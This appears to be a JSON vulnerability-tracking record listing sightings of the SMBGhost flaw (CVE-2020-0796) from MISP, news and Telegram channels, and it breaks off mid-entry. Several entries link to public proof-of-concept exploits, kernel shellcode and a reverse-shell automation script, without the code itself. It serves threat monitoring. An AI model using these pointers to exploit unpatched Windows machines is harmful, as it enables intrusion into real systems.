{"vulnerability": "cve-2020-0796", "sightings": [{"uuid": "757574f9-996f-43ef-9a0c-2baffa274f29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/48e15610-a505-4067-8dec-4627e36bcbe7", "content": "", "creation_timestamp": "2020-10-14T09:36:45.000000Z"}, {"uuid": "1dc21360-f154-4924-9a8c-c68cd4d12933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/780a2f65-1062-43e5-a617-5a826e27c67d", "content": "", "creation_timestamp": "2020-08-05T06:00:42.000000Z"}, {"uuid": "011b1da3-3526-4451-86b3-9b0ea4c16beb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "6b0d7494-b7bf-477b-9f7b-e6b7e297e40b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971250", "content": "", "creation_timestamp": "2024-12-24T20:26:30.572886Z"}, {"uuid": "66ed6101-d01c-4450-8111-6003bf0d86d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "67626764-83f2-4739-937b-c662eaec51fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2020-0796", "type": "seen", "source": "https://gist.github.com/Cur10s1tyByt3/050c04a0b2a3f4fb4121e1cbae24f70e", "content": "", "creation_timestamp": "2025-01-29T12:59:52.000000Z"}, {"uuid": "8b1c5fcf-70c1-423e-8f67-ae3c3142818d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_0796_smbghost.rb", "content": "", "creation_timestamp": "2020-04-03T16:39:48.000000Z"}, {"uuid": "74fa3666-9630-44a5-8211-bcb65abb16d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:20.000000Z"}, {"uuid": "1e609e6e-d20f-41ef-931c-9c26f6fd6107", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:26.000000Z"}, {"uuid": "7977541a-edd6-4664-b1f2-cb0f4bbc4739", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lsp2i6nj6n2k", "content": "", "creation_timestamp": "2025-06-28T21:02:22.481447Z"}, {"uuid": "561f881d-042c-420e-8c4f-5c30908606fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb", "content": "", "creation_timestamp": "2021-05-20T22:10:20.000000Z"}, {"uuid": "04bba5c3-32a2-4c7e-bb34-89a31adb1b33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": "2025-08-31T03:00:57.000000Z"}, {"uuid": "25e55ad1-5b69-4b3c-909d-5c5d31c509e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/1413a78e-c0b3-4092-97e7-909fb9773448", "content": "", "creation_timestamp": "2025-08-06T13:54:20.000000Z"}, {"uuid": "2cbf2466-ea5d-4ea9-845f-5b8b03f93735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/1413a78e-c0b3-4092-97e7-909fb9773448", "content": "", "creation_timestamp": "2025-08-14T11:44:23.000000Z"}, {"uuid": "929b8f85-62a0-473c-80a9-0e68262fb5a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://gist.github.com/hpedljo/967b7c7bd60b47351303a6b11d815335", "content": "", "creation_timestamp": "2026-02-11T23:54:29.000000Z"}, {"uuid": "882300ef-6a7e-4a9c-9d78-e8c65ece5c20", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "MISP/d17bd6ef-d68b-317b-ac33-cdbc44c5fc57", "content": "", "creation_timestamp": "2025-08-31T03:12:42.000000Z"}, {"uuid": "21f89701-0ce4-4587-8ba8-04f77fa8f922", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://gist.github.com/strikoder/99635df00444bbf5fc90ca83ec8051a0", "content": "", "creation_timestamp": "2025-12-01T12:02:42.000000Z"}, {"uuid": "c57dcdbf-0824-4a68-92b7-eb016396032f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/f9e202ca-7c63-4da8-86e3-3ba528ec5b39", "content": "", "creation_timestamp": "2026-02-02T12:28:23.960939Z"}, {"uuid": "7b0947ea-8488-43b6-92c5-818c946cfa10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://gist.github.com/aw-junaid/676778028c81ea4b72359c6ffffdf9e5", "content": "", "creation_timestamp": "2026-02-21T18:14:32.000000Z"}, {"uuid": "4262502c-90af-421f-ad58-99d310657838", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=458", "content": "", "creation_timestamp": "2020-03-11T04:00:00.000000Z"}, {"uuid": "ec557794-4f43-4240-bfba-8facff773463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://bsky.app/profile/gitrated.bsky.social/post/3mi44kmttq725", "content": "", "creation_timestamp": "2026-03-28T07:33:13.234687Z"}, {"uuid": "351e072b-49d7-470d-819c-a0a4ac5e1764", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/srv_admin/281", "content": "\u041d\u043e\u0432\u0430\u044f \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 smb \u043f\u043e\u0434\u044a\u0435\u0445\u0430\u043b\u0430. \u042f \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0435\u0433\u043e\u0434\u043d\u044f \u043e \u043d\u0435\u0439 \u0443\u0437\u043d\u0430\u043b. \u041f\u0440\u0438\u0447\u0435\u043c \u0434\u043b\u044f \u043d\u0435\u0435 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u0433\u043e\u0442\u043e\u0432\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442. \u041f\u0440\u0438\u043c\u0435\u0440 \u0435\u0433\u043e \u0440\u0430\u0431\u043e\u0442\u044b \u0432 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0434\u0435\u043c\u043a\u0435 - https://xakep.ru/wp-content/uploads/2020/06/307087/CVE-2020-0796-RCE-POC-demo.gif \u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043d\u0430 \u0425\u0430\u043a\u0435\u0440\u0435 \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0447\u0438\u0442\u0430\u0442\u044c - https://xakep.ru/2020/06/11/smbleed/ \u041d\u0430\u0434\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c\u0441\u044f, \u043d\u0435 \u043e\u0442\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u044f.", "creation_timestamp": "2020-06-15T07:14:50.000000Z"}, {"uuid": "8bb5afff-4935-49c2-ac80-df5941c36532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/antichat/8058", "content": "\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 SMB v3: CVE-2020-0796\nhttps://habr.com/ru/post/491964/?utm_campaign=491964&utm_source=habrahabr&utm_medium=rss", "creation_timestamp": "2020-03-12T06:31:37.000000Z"}, {"uuid": "8e748935-60e5-46d7-a741-b435816b63e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/orderofsixangles/1573", "content": "Full SMB Ghost KernelShellCode\n\nhttp://www.whsgwl.net/code/CVE-2020-0796_KernelShellCode.asm", "creation_timestamp": "2021-09-01T07:15:38.000000Z"}, {"uuid": "8e518d5d-7076-4444-9976-8ef54647124d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "Telegram/mj_jLe9zF98qzP0muEndiIzcXIIQUKzfoVd9IRjGpm0", "content": "", "creation_timestamp": "2020-03-13T22:39:49.000000Z"}, {"uuid": "0da8168e-2b91-4bc0-9260-61d9c6867255", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "Telegram/RfP-6g3PRC3zxTuKh1hIEXR_naUVe0ey42H849a_qcjjhUc", "content": "", "creation_timestamp": "2025-09-22T03:00:06.000000Z"}, {"uuid": "8c965410-198a-4989-8f82-26ee7fdde842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/BleepingComputer/6956", "content": "48K Windows Hosts Vulnerable to SMBGhost CVE-2020-0796 RCE Attacks\n\nAfter an Internet-wide scan, researchers at\u00a0cybersecurity\u00a0firm\u00a0Kryptos Logic discovered roughly 48,000 Windows 10 hosts vulnerable to attacks targeting the\u00a0pre-auth remote code execution CVE-2020-0796\u00a0vulnerability found in Microsoft Server Message Block 3.1.1 (SMBv3). [...]\n\nhttps://www.bleepingcomputer.com/news/security/48k-windows-hosts-vulnerable-to-smbghost-cve-2020-0796-rce-attacks/", "creation_timestamp": "2020-03-12T18:47:24.000000Z"}, {"uuid": "302f694e-2a0d-46fe-a564-9aa3ae147c7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/BleepingComputer/6947", "content": "Microsoft Leaks Info on Wormable Windows SMBv3 CVE-2020-0796 Flaw\n\nMicrosoft leaked info on a security update for a 'wormable' pre-auth remote code execution vulnerability found in the Server Message Block 3.0 (SMBv3) network communication protocol that reportedly should have been disclosed as part of this month's Patch Tuesday. [...]\n\nhttps://www.bleepingcomputer.com/news/security/microsoft-leaks-info-on-wormable-windows-smbv3-cve-2020-0796-flaw/", "creation_timestamp": "2020-03-10T23:02:59.000000Z"}, {"uuid": "3c04c0b2-e14e-4c3e-b382-042320d25430", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/BleepingComputer/7491", "content": "Windows 10 SMBGhost bug gets public proof-of-concept RCE exploit\n\nWorking exploit code that achieves remote code execution on Windows 10 machines is now publicly available for CVE-2020-0796, a critical vulnerability in Microsoft Server Message Block (SMB 3.1.1). [...]\n\nhttps://www.bleepingcomputer.com/news/security/windows-10-smbghost-bug-gets-public-proof-of-concept-rce-exploit/", "creation_timestamp": "2020-06-05T18:45:25.000000Z"}, {"uuid": "2275101c-b36b-4117-8add-4e4d09fba4e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/BleepingComputer/7185", "content": "Windows 10 SMBGhost RCE exploit demoed by researchers\n\nA proof-of-concept remote code execution (RCE) exploit for the Windows 10 CVE-2020-0796 'wormable' pre-auth remote code execution vulnerability was developed and demoed today by researchers at Ricerca Security. [...]\n\nhttps://www.bleepingcomputer.com/news/security/windows-10-smbghost-rce-exploit-demoed-by-researchers/", "creation_timestamp": "2020-04-20T19:22:55.000000Z"}, {"uuid": "3726a4f9-3c43-4255-9afd-22e24d22c323", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/open_source_friend/52", "content": "SMBGhost\n\n\u041f\u0440\u043e\u0441\u0442\u043e\u0439 \u0441\u043a\u0430\u043d\u0435\u0440 \u043d\u0430 \u043f\u0438\u0442\u043e\u043d\u044f\u0447\u0435\u043c \u0434\u043b\u044f CVE-2020-0796 - SMBv3 RCE.\n\n\u042d\u0442\u043e \u0434\u044b\u0440\u043a\u0430 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Windows 10 \u0438 Windows Server, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0435\u0439 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b Microsoft Server Message Block 3.1.1 (SMBv3). \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043d\u0430 \u0441\u0442\u043e\u0440\u043e\u043d\u0435 SMB-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438\u043b\u0438 SMB-\u043a\u043b\u0438\u0435\u043d\u0442\u0430.\n\nhttps://github.com/ollypwn/SMBGhost", "creation_timestamp": "2025-07-18T07:40:07.000000Z"}, {"uuid": "270e1773-7343-4bcb-aa5c-f7d388ad3a85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1914", "content": "CVE-2020-0796\nWindows SMBv3 LPE Exploit\nhttps://github.com/danigargu/CVE-2020-0796\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-07-05T13:00:57.000000Z"}, {"uuid": "ba49dc52-ba09-4d33-85db-78d1e225c2ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "seen", "source": "https://t.me/poxek/2628", "content": "CVE-2020-0796\n\nWindows SMBv3 LPE Exploit\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0441\u043f\u043e\u0441\u043e\u0431\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c Microsoft SMB 3.1.1. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a, \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0439\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u0414\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u043d\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0439 \u043f\u0430\u043a\u0435\u0442 \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 SMBv3-\u0441\u0435\u0440\u0432\u0435\u0440. \u0427\u0442\u043e\u0431\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0435, \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0438\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 SMBv3-\u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0443\u0431\u0435\u0434\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043a \u043d\u0435\u043c\u0443.\n\n#CVE #POC", "creation_timestamp": "2022-12-14T17:06:47.000000Z"}, {"uuid": "1887ba62-49a9-47e0-a1fa-e368ebc14a47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "exploited", "source": "https://t.me/poxek/1203", "content": "CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\n\u042d\u0442\u043e\u0442 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u043a \u0446\u0435\u043b\u0435\u0432\u043e\u043c\u0443 \u0443\u0437\u043b\u0443 \u0438 \u0441\u0436\u0438\u043c\u0430\u0435\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0441 \u043f\u043b\u043e\u0445\u0438\u043c \u043f\u043e\u043b\u0435\u043c \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u044f, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u0432 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u0435 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0431\u0443\u0444\u0435\u0440\u0430 \u0434\u0435\u043a\u043e\u043c\u043f\u0440\u0435\u0441\u0441\u043e\u0440\u0430 \u0438 \u0430\u0432\u0430\u0440\u0438\u0439\u043d\u043e\u043c\u0443 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044e \u0440\u0430\u0431\u043e\u0442\u044b \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0443\u0437\u043b\u0430.\nhttps://github.com/eerykitty/CVE-2020-0796-PoC\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-04-01T18:01:24.000000Z"}, {"uuid": "7a887f83-cf2b-45f0-a5aa-a14f4cccfd3f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1877", "content": "Custom NSE scripts\nCVE-2020-0796\nNSE \u0441\u043a\u0440\u0438\u043f\u0442 \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-0796, \u0432 Microsoft SMBv3 Compression (aka coronablue, SMBGhost).  \u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0432\u0435\u0440\u0441\u0438\u044e \u0441\u043a\u0440\u0438\u043f\u0442\u0430 smb-protocols.nse \u0441 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u043d\u044b\u043c\u0438 \u0432\u044b\u0445\u043e\u0434\u043d\u044b\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f v3.11 \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 CVE-2020-0796.\n\u041f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u0435: \u042d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u043e\u0441\u0442\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2020-0796 \u0432 SMBv3 \u0438 \u043d\u0435 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0438\u0447\u0435\u0433\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0441\u0432\u0435\u0440\u0445 \u044d\u0442\u043e\u0433\u043e.\nhttps://github.com/psc4re/NSE-scripts\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-07-01T09:01:49.000000Z"}, {"uuid": "3b2f7036-c831-4224-833c-d92cbd451725", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-0796", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2751", "content": "SMBGhost (CVE-2020-0796) Automate Exploitation and Detection\n\n\u042d\u0442\u043e\u0442 python-\u0441\u043a\u0440\u0438\u043f\u0442 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0431\u0435\u0440\u0442\u043a\u043e\u0439 \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RCE SMBGhost. \u0412\u0441\u0435 \u0437\u0430\u0441\u043b\u0443\u0433\u0438 \u0437\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 - chompie1337. \u0412\u0441\u0435 \u0437\u0430\u0441\u043b\u0443\u0433\u0438 \u0437\u0430 \u0441\u043a\u0430\u043d\u0435\u0440 - ioncodes.\n\u042f \u043f\u0440\u043e\u0441\u0442\u043e \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b \u044d\u0442\u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0432 \u043e\u0434\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0435. \u0412\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u0438\u043c\u0435\u0442\u044c \u0432 \u0432\u0438\u0434\u0443 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u0443 Windows-\u043c\u0438\u0448\u0435\u043d\u0438, \u043a\u043e\u0433\u0434\u0430 \u0432\u044b \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u0442\u0435\u0441\u044c \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043e\u0431\u0440\u0430\u0442\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443.\n\n\u042d\u0442\u043e\u0442 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0435 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f 